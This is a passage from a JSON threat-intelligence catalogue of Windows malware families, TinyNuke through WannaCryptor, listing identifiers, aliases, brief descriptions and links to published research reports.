arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", "https://krebsonsecurity.com/tag/nuclear-bot/", "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/" ], "synonyms": [ "MicroBankingTrojan", "Nuclear Bot", "NukeBot", "Xbot" ], "type": [] }, "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", "value": "TinyNuke" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" ], "synonyms": [], "type": [] }, "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", "value": "TinyTyphon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" ], "synonyms": [], "type": [] }, "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", "value": "TinyZbot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" ], "synonyms": [], "type": [] }, "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", "value": "Tiop" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" ], "synonyms": [ "Gheg" ], "type": [] }, "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", "value": "Tofsee" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" ], "synonyms": [], "type": [] }, "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", "value": "TorrentLocker" }, { "description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trat", "https://www.proofpoint.com/us/threat-insight/post/trat-new-modular-rat-appears-multiple-email-campaigns" ], "synonyms": [], "type": [] }, "uuid": "b9e6e4bd-57e8-44e7-853c-8dcb83c26079", "value": "tRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html", "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", "http://adelmas.com/blog/treasurehunter.php" ], "synonyms": [ "huntpos" ], "type": [] }, "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", "value": "TreasureHunter" }, { "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", "http://www.malware-traffic-analysis.net/2018/02/01/", "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/evolving-trickbot-adds-detection-evasion-and-screen-locking-features", "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", "https://www.youtube.com/watch?v=EdchPEHnohw", "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", "https://www.youtube.com/watch?v=lTywPmZEU1A", "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" ], "synonyms": [ "TheTrick", "TrickLoader", "Trickster" ], "type": [] }, "uuid": "c824813c-9c79-4917-829a-af72529e8329", "value": "TrickBot" }, { "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", "https://dragos.com/blog/trisis/TRISIS-01.pdf" ], "synonyms": [ "HatMan", "Trisis" ], "type": [] }, "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", "value": "Triton" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", "https://github.com/5loyd/trochilus/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf" ], "synonyms": [], "type": [] }, "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", "value": "Trochilus RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/" ], "synonyms": [ "Shade" ], "type": [] }, "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", "value": "Troldesh" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" ], "synonyms": [], "type": [] }, "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", "value": "Trump Ransom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" ], "synonyms": [], "type": [] }, "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", "value": "Tsifiri" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" ], "synonyms": [], "type": [] }, "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", "value": "TURNEDUP" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", "https://www.lastline.com/labsblog/tyupkin-atm-malware/" ], "synonyms": [], "type": [] }, "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", "value": "Tyupkin" }, { "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", "https://github.com/hfiref0x/UACME" ], "synonyms": [ "Akagi" ], "type": [] }, "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", "value": "UACMe" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns" ], "synonyms": [], "type": [] }, "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", "value": "UDPoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" ], "synonyms": [], "type": [] }, "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", "value": "Uiwix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" ], "synonyms": [], "type": [] }, "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", "value": "Unidentified 001" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" ], "synonyms": [], "type": [] }, "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", "value": "Unidentified 003" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" ], "synonyms": [], "type": [] }, "uuid": "ff80f82d-2556-4cda-8cf2-aa6b21d59dc9", "value": "win.unidentified_005" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" ], "synonyms": [], "type": [] }, "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", "value": "Unidentified 006" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" ], "synonyms": [], "type": [] }, "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", "value": "Unidentified 013 (Korean)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", "https://wikileaks.org/ciav7p1/cms/page_34308128.html" ], "synonyms": [], "type": [] }, "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", "value": "Unidentified 020 (Vault7)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" ], "synonyms": [], "type": [] }, "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", "value": "Unidentified 022 (Ransom)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" ], "synonyms": [], "type": [] }, "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", "value": "Unidentified 023" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_024_ransom", "https://twitter.com/malwrhunterteam/status/789161704106127360" ], "synonyms": [], "type": [] }, "uuid": "acf6c476-847c-477a-b640-18a5c99e3c2b", "value": "Unidentified 024 (Ransomware)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_025_clickfraud", "http://malware-traffic-analysis.net/2016/05/09/index.html" ], "synonyms": [], "type": [] }, "uuid": "f43a0e38-2394-4538-a123-4a0457096058", "value": "Unidentified 025 (Clickfraud)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_028" ], "synonyms": [], "type": [] }, "uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b", "value": "Unidentified 028" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_029" ], "synonyms": [], "type": [] }, "uuid": "aff47054-7130-48ca-aa2c-247bdf44f180", "value": "Unidentified 029" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", "https://twitter.com/JaromirHorejsi/status/877811773826641920" ], "synonyms": [], "type": [] }, "uuid": "7287a0b0-b943-4007-952f-07b9475ec184", "value": "Filecoder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_031" ], "synonyms": [], "type": [] }, "uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e", "value": "Unidentified 031" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_032", "https://researchcenter.paloaltonetworks.com/2017/08/unit42-blockbuster-saga-continues/" ], "synonyms": [], "type": [] }, "uuid": "799921d7-48e8-47a6-989e-487b527af37a", "value": "Unidentified 032" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_033" ], "synonyms": [], "type": [] }, "uuid": "f716681e-c1fd-439a-83aa-3147bb9f082f", "value": "Unidentified 033" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_035" ], "synonyms": [], "type": [] }, "uuid": "ba014661-d1d4-4a69-a698-9f4120de9260", "value": "Unidentified 035" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_037" ], "synonyms": [], "type": [] }, "uuid": "d073f9e5-8aa8-4e66-ba47-f332759199a2", "value": "Unidentified 037" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_038" ], "synonyms": [], "type": [] }, "uuid": "d53e96c5-abfa-4be4-bb33-0a898c5aff58", "value": "Unidentified 038" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_039" ], "synonyms": [], "type": [] }, "uuid": "97c1524a-c052-49d1-8770-14b513d8a830", "value": "Unidentified 039" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_041" ], "synonyms": [], "type": [] }, "uuid": "88d70171-fc89-44d1-8931-035c0b095247", "value": "Unidentified 041" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042", "http://www.intezer.com/lazarus-group-targets-more-cryptocurrency-exchanges-and-fintech-companies/" ], "synonyms": [], "type": [] }, "uuid": "168bf2a1-45a5-41ac-b364-5740e7ce9757", "value": "Unidentified 042" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_044" ], "synonyms": [], "type": [] }, "uuid": "df9c8440-b4da-4226-b982-e510d06cf246", "value": "Unidentified 044" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_045" ], "synonyms": [], "type": [] }, "uuid": "4cb8235a-7e70-4fad-9244-69215750d559", "value": "Unidentified 045" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_046", "https://twitter.com/DrunkBinary/status/1006534471687004160" ], "synonyms": [], "type": [] }, "uuid": "878ab9fc-a526-43bd-81ac-3eba14ba0f1f", "value": "Unidentified 046" }, { "description": "RAT written in Delphi used by Patchwork APT.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_047", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" ], "synonyms": [], "type": [] }, "uuid": "18da6a0e-abe9-4f65-91a3-2bf5a5ad29c2", "value": "Unidentified 047" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_048", "https://twitter.com/DrunkBinary/status/1002587521073721346" ], "synonyms": [], "type": [] }, "uuid": "3304c5ce-85f0-4648-b95f-33cf9621cd2f", "value": "Unidentified 048 (Lazarus?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_049", "https://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/" ], "synonyms": [], "type": [] }, "uuid": "abd22cec-49ee-431f-a2e6-e4722b3e44bb", "value": "Unidentified 049 (Lazarus/RAT)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_051", "https://twitter.com/CDA/status/1014144988454772736" ], "synonyms": [], "type": [] }, "uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5", "value": "Unidentified 051" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_052" ], "synonyms": [], "type": [] }, "uuid": "80c12fcd-e5ef-4549-860d-7928363022f9", "value": "Unidentified 052" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_053", "https://labsblog.f-secure.com/2015/11/24/wonknu-a-spy-for-the-3rd-asean-us-summit/" ], "synonyms": [], "type": [] }, "uuid": "b60e32bd-158a-42b9-ac21-288bca4c8233", "value": "Unidentified 053 (Wonknu?)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unlock92", "https://twitter.com/struppigel/status/810753660737073153", "https://twitter.com/bartblaze/status/976188821078462465" ], "synonyms": [], "type": [] }, "uuid": "036e657f-a752-4a4c-bb30-f15c24d954e6", "value": "Unlock92" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upas", "https://malware.dontneedcoffee.com/2012/08/inside-upas-kit1.0.1.1.html", "https://twitter.com/ulexec/status/1005096227741020160", "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/" ], "synonyms": [ "Rombrast" ], "type": [] }, "uuid": "b64ea39b-3ec2-49e3-8992-02d71c21b1bd", "value": "UPAS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", "https://secrary.com/ReversingMalware/Upatre/" ], "synonyms": [], "type": [] }, "uuid": "925390a6-f88d-46dc-96ae-4ebc9f0b50b0", "value": "Upatre" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urausy" ], "synonyms": [], "type": [] }, "uuid": "5af4838f-1b4d-4f0b-bd27-50ef532e84f7", "value": "Urausy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", "https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/", "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/" ], "synonyms": [ "Bebloh", "Shiotob" ], "type": [] }, "uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe", "value": "UrlZone" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3193&sid=9fe4a57263c91a8b18bc43ae23afc453", "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/" ], "synonyms": [ "Snake" ], "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", "value": "Uroburos (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak", "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/", "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html", "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak", "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" ], "synonyms": [ "Catch", "NeverQuest", "grabnew" ], "type": [] }, "uuid": "b662c253-5c87-4ae6-a30e-541db0845f67", "value": "Vawtrak" }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.velso", "https://www.bleepingcomputer.com/news/security/the-velso-ransomware-being-manually-installed-by-attackers/" ], "synonyms": [], "type": [] }, "uuid": "5490d2c7-72db-42cf-a1a4-02be1b3ade5f", "value": "Velso Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.venus_locker", "https://twitter.com/JaromirHorejsi/status/813690129088937984" ], "synonyms": [], "type": [] }, "uuid": "7a0137ad-df7a-4fae-8365-eb36cc7e60cd", "value": "Venus Locker" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] }, "uuid": "2d07a1bf-1d8d-4f1e-a02f-1a8ff5b76cd1", "value": "Vermin" }, { "description": "Vflooder floods VirusTotal by infinitely submitting a copy of itself. Some variants apparently also try to flood Twitter. The impact on these services are negligible, but for researchers it can be a nuisance. Most versions are protectd by VMProtect.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vflooder", "https://blog.malwarebytes.com/threat-analysis/2017/10/analyzing-malware-by-api-calls/" ], "synonyms": [], "type": [] }, "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virdetdoor", "https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks" ], "synonyms": [], "type": [] }, "uuid": "30161733-993f-4a1c-bcc5-7b4f1cd7d9e4", "value": "virdetdoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" ], "synonyms": [], "type": [] }, "uuid": "2e99f27c-6791-4695-b88b-de4d4cbda8d6", "value": "Virut" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus", "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", "https://securityintelligence.com/new-zberp-trojan-discovered-zeus-zbot-carberp/", "https://asert.arbornetworks.com/wp-content/uploads/2015/08/ZeusVM_Bits_and_Pieces.pdf" ], "synonyms": [ "VMzeus", "Zberp", "ZeusVM" ], "type": [] }, "uuid": "c32740a4-db2c-4d71-80bd-7377185f4a6f", "value": "VM Zeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vobfus", "http://contagiodump.blogspot.com/2012/12/nov-2012-worm-vobfus-samples.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/whats-the-fuss-with-worm_vobfus/" ], "synonyms": [], "type": [] }, "uuid": "60f7b1b9-c283-4395-909f-7b8b1731e840", "value": "Vobfus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.volgmer", "https://www.us-cert.gov/ncas/alerts/TA17-318B", "https://securelist.com/operation-applejeus/87553/" ], "synonyms": [ "FALLCHILL", "Manuscrypt" ], "type": [] }, "uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f", "value": "Volgmer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vreikstadi", "https://twitter.com/malware_traffic/status/821483557990318080" ], "synonyms": [], "type": [] }, "uuid": "ab2a63f1-1afd-44e7-9cf4-c775dbee78f4", "value": "Vreikstadi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vskimmer", "http://www.xylibox.com/2013/01/vskimmer.html", "http://vkremez.weebly.com/cyber-security/-backdoor-win32hesetoxa-vskimmer-pos-malware-analysis", "https://securingtomorrow.mcafee.com/mcafee-labs/vskimmer-botnet-targets-credit-card-payment-terminals/" ], "synonyms": [], "type": [] }, "uuid": "3eae1764-7ea6-43e6-85a1-b1dd0b4856b8", "value": "vSkimmer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times", "https://attack.mitre.org/wiki/Group/G0022" ], "synonyms": [], "type": [] }, "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannacryptor", "https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today", "https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html", "http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html", "https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168", "https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e", "https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58", "https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984", "https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/", "https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/", "https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html", 